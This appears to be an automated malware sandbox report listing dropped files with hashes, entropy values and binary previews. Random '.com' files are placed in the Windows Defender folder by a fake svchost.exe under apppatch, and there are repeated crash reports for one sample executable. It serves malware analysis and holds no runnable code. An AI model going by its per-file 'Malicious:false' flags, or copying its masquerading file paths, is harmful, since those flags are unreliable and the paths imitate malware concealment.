                                                                                                                                                                                                              MD5:04ACB993833ED85F1F5F6E355C15B8EC
                                                                                                                                                                                                              SHA1:5E65252CFBAC2D2EA75B77E7343ADAB5D4E7F2B6
                                                                                                                                                                                                              SHA-256:E523DF6FB97A0F0F047B456AF03AD5346010CCECE235F36B00F54C13EEAB9682
                                                                                                                                                                                                              SHA-512:8E206C11059EF790F510895D298900B0D840A666403A18407C249195BD38269F75CC6BE96A54A1E92A2B43B26D2A8CC12C673C64C1417C1E97E686414B3C79EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.".....O.m..-..&.u....v.....m...^.c..L.i..pZ..L#..E2..E..r..1.+..}.p.3...iH5.&f..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.5..I.....<#.;/..5Z..*r.@....t..`dU:....G+U..Y..,..\X.R......... T.!.J..*s..,.%.-.....h..U..OT...f.h._..zf..^.".1.D.)"<..]Z.9..`..f4P..C\...@..n.'...li?=...I....{G...j.R.L5.JK=....S..6.BJ_Y_.((.IFb....,.>*..w...........$"..~...5..gk..~.07u.....7O...&.IlU.O..b.@.%.(9....j...d.%.7c.*#{K,.......6.V..Q0.....Ot.r.'.f.p.[.A.<..l@.".).....4.......].J.H.tN'..M.&..n.k.;.S.b.7...........J..f(....b.<....>.....NdIWm....{...(;$H....<.............l..+~..o.Nk.N...O...E..F.'%..s.#...\..{S...DE7*aX...~o.......#...f....c.K..B.M.b;..Jom.........Z..t.Y....l....n.O.pn...&..$&.........<.........0.,.M.3.........SCb..&\.L..Y.C.vD.(./...$u.V.=......U".~..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):7.626935561277827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                              MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                              SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                              SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                              SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\galyqaz.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43182
                                                                                                                                                                                                              Entropy (8bit):7.991084036629475
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:768:A6eLDU7W3WFK7yI4tqcLQa33mXYoQwjWO8Yz+EFdUJ/6l0XnxytlCI88h/hxaW:AD33bOI4tPV3+xzWO8Yz7FdUJSuXnxC1
                                                                                                                                                                                                              MD5:AF34E47103CF2EB9B39D0C55FFED1EAC
                                                                                                                                                                                                              SHA1:847F0D0DE2A90C5B924EECFE2CC90C06FD17ABCB
                                                                                                                                                                                                              SHA-256:8D6A7AFB31F8231244F13832BFD101640A6192F53E1F770F9FF0B4E8720DE6C0
                                                                                                                                                                                                              SHA-512:9EFEEDBBE9D51D3D1EACD3A24DB4F134F9284096BB0A235890CE4C43E7641B018011244BD9B4FBC22BBFE9A0865E8B0CB9478CB155DC4D93A6660A5D2D840DBE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..|^..fT.G....t..91.*.....~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A........*..IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op......*.............l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...|d....X..h...e...A".....O.). v....$Q....5.....;..*lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):6.479691220248167
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                              MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                              SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                              SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                              SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\puzylyp.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59521
                                                                                                                                                                                                              Entropy (8bit):7.972536779168374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1b:ZRukFmHy4rG5tUb
                                                                                                                                                                                                              MD5:C6268A2DD44D331387D6E513716B65A1
                                                                                                                                                                                                              SHA1:2D982D846C22D45A7E07AB0139E9C90536B930CC
                                                                                                                                                                                                              SHA-256:D9CE9ACB199C9EA90F2315C552199D381BAD0A9971767F1FE309F5444BA9B2CD
                                                                                                                                                                                                              SHA-512:481BAD462004CF0300A0983C742CA71C39586C499D69926980EC279ECEE27CAD6C82AA38BBC5280073A95AA45F1FF051AB5BABA9643055462C0F2D18164BC780
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<*../.. ..>.Y......:X..G..4.j....{W.A. ........*.....6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+*...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...|.....(.$.......`<..n..|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N*.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..|...,..|;.e.+<;...l..I..,.Kf^....$.&.$.|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\qetyhyg.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):7.626935561277827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                              MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                              SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                              SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                              SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):114
                                                                                                                                                                                                              Entropy (8bit):6.479691220248167
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                              MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                              SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                              SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                              SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25028
                                                                                                                                                                                                              Entropy (8bit):7.979531985378584
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:N4ak8nl3r9Htb/yu0qOZZAjjWk5rSV4Z8tPzh3XCV5:yJElb9HPtOZEjWKW4S8P
                                                                                                                                                                                                              MD5:C9696F79799FA5BA5206F94129885F28
                                                                                                                                                                                                              SHA1:6881778879C5FB0C9F06DF425F893927505B6777
                                                                                                                                                                                                              SHA-256:72D529A7929896257E4B7DB4EE480213F944654070D1ED47E3F7E167C5D4957D
                                                                                                                                                                                                              SHA-512:6FEFE993372D9F7B6707E1A153ADC3ACAE2E52C95C19CAF2F819E1B98CD83FD57E8C79DADCA7AE075FF8A560E4B021BF4424435E87ADAEC0679A7FD99E0D95B9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z..........>..O...... ..Di....K..n,x&.y'N./:rI.c&..bE..'.\f.A.....~.k.o...$oF.&t..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\vojyqem.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1094
                                                                                                                                                                                                              Entropy (8bit):7.848347003000776
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHvkTXRUubBU:QsSixez1Rg8ypkTXRdBU
                                                                                                                                                                                                              MD5:3F46C8333D071C3DACA82DC8C12C7D3D
                                                                                                                                                                                                              SHA1:C373BFFB0BF50CB378F6DE8AF9145B17256A59EA
                                                                                                                                                                                                              SHA-256:191FACDF1EA85248CF0BA2AEA6AB40D975A3FB9F6962A8339A424AC2376B7815
                                                                                                                                                                                                              SHA-512:75A672CDC4B15B4083F56EB54F3F4393895A9AB050186D9553E7AD1773B3474A0A6A6EF8A07F7B30ABA253C3985BCA613883B8B66DE49152884D87D887287E0A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^.......Td..|.......2.O....l......oc.....[Q..I(M....."..........\...9...-.9>.6..;R*..|........|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_00ef9491-a7ff-4108-a8ab-ee2211b0e9c0\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9549394430616321
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5cykAeiRplij0BU/bf+fxjRJk1zuiF0zZ24IO8m3fHcs:yybDlbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:219A26A739509C5B0F134794C04332B5
                                                                                                                                                                                                              SHA1:8434B4EDD36C9365436DB46D0A818C8584FDDD77
                                                                                                                                                                                                              SHA-256:2C583ED9EC0920982F3FF15E27B21D3E527C93169FAFF8EB44A78CEEEE46B821
                                                                                                                                                                                                              SHA-512:84EC27E4934325B13497A170764BD03368AA98C9EE223D1DE00F9BDE03603F57F38D7454BA4439C16CCAA3793F4CB17C9DA1A2DD7BD0697DA4A2ABD55974AC68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.2.1.5.1.9.9.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.3.4.8.0.1.2.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.e.f.9.4.9.1.-.a.7.f.f.-.4.1.0.8.-.a.8.a.b.-.e.e.2.2.1.1.b.0.e.9.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.b.3.a.8.e.9.-.1.9.c.9.-.4.6.b.a.-.9.1.9.e.-.f.8.0.f.f.a.c.4.b.2.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.d.a.e.2.-.9.7.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_08f458bf-dcff-41ee-9571-8a52739bb31a\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9487347981952056
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6f5PnVeiRpfij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:K5vVDfbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:5EA689331AF296FCC2AEA4B18DEB3E87
                                                                                                                                                                                                              SHA1:EF61DFBEC38E3A8AC42C64C7CA8D0B0B01D2E2F3
                                                                                                                                                                                                              SHA-256:916E526E436B4EF5E2C20BE67383ED8C925E2529EEAA155219D493C302A83A8C
                                                                                                                                                                                                              SHA-512:7C2FC989D07E8A3E2D04A670D68E67FA1E5875778AF0EFC53EF5512F0FC72A00C5E2CCA10436B6B1349CF483009648A03CBB4145D18D953B7B6D29EF93ECEE7F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.3.9.7.7.8.8.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.4.7.9.0.3.7.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.f.4.5.8.b.f.-.d.c.f.f.-.4.1.e.e.-.9.5.7.1.-.8.a.5.2.7.3.9.b.b.3.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.2.9.1.4.0.8.-.7.8.5.2.-.4.b.6.6.-.b.1.f.b.-.b.6.0.1.a.c.9.4.5.6.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.0.-.0.0.0.1.-.0.0.1.4.-.f.0.b.1.-.9.2.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_32e20a01-1d87-4eb7-b808-ff0da1d0232f\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9482814524220444
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:PQBELFgeiRpLij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:IBnDLbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:4DF5DCCC1B3B737CACA3F2949E5A8F0A
                                                                                                                                                                                                              SHA1:B5EA6C549D6DDF14F34F78E14392F18C4DBA9AB1
                                                                                                                                                                                                              SHA-256:2C34457000520F14022CD609F3D35173A8DAE41BDD329CCF2CE445C5F52D3BC9
                                                                                                                                                                                                              SHA-512:B77A85FCCBC8FD5225C137A3081E2A41B4B64116127174E1EA0A645F89E733FF12A81E64316015E5CADDC25A0AA71D48870BB28CE65A498773C8008E0C9DE173
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.3.1.3.1.9.3.9.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.3.2.2.2.5.6.3.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.e.2.0.a.0.1.-.1.d.8.7.-.4.e.b.7.-.b.8.0.8.-.f.f.0.d.a.1.d.0.2.3.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.f.9.c.0.3.2.-.9.c.6.b.-.4.6.2.f.-.9.a.0.2.-.8.4.5.f.8.4.e.1.d.1.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.5.8.-.0.0.0.1.-.0.0.1.4.-.9.0.2.f.-.8.3.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tGYLgZxMWmmBTD.e_7861b0bb7bc644126dae152d1d917bb866b9f5db_040324e6_48f79613-1bc7-4f56-9158-af45c6a6c270\Report.wer

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9491122628919814
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:kgCeiRppij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:ODpbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:C463B3DA714A49F4A94C39EA5F662AFB
                                                                                                                                                                                                              SHA1:C90148F0ABD000BBC4D21BA2485382916AF0CCED
                                                                                                                                                                                                              SHA-256:34EB98F141AC536C2BC31BE621785A598A56EEF015C74C72BDD16B07C6F77360
                                                                                                                                                                                                              SHA-512:D227A54B6F30BEB2D795E955F6101DFA1EC7A384AC3E7F21D48657FA1979AACE7D6BEC726633723FDCA1BE71E7A5423EAD14CC2A47BF1A483FA02D0758330FD7
                                                                                                                                                                                                              Malicious:false
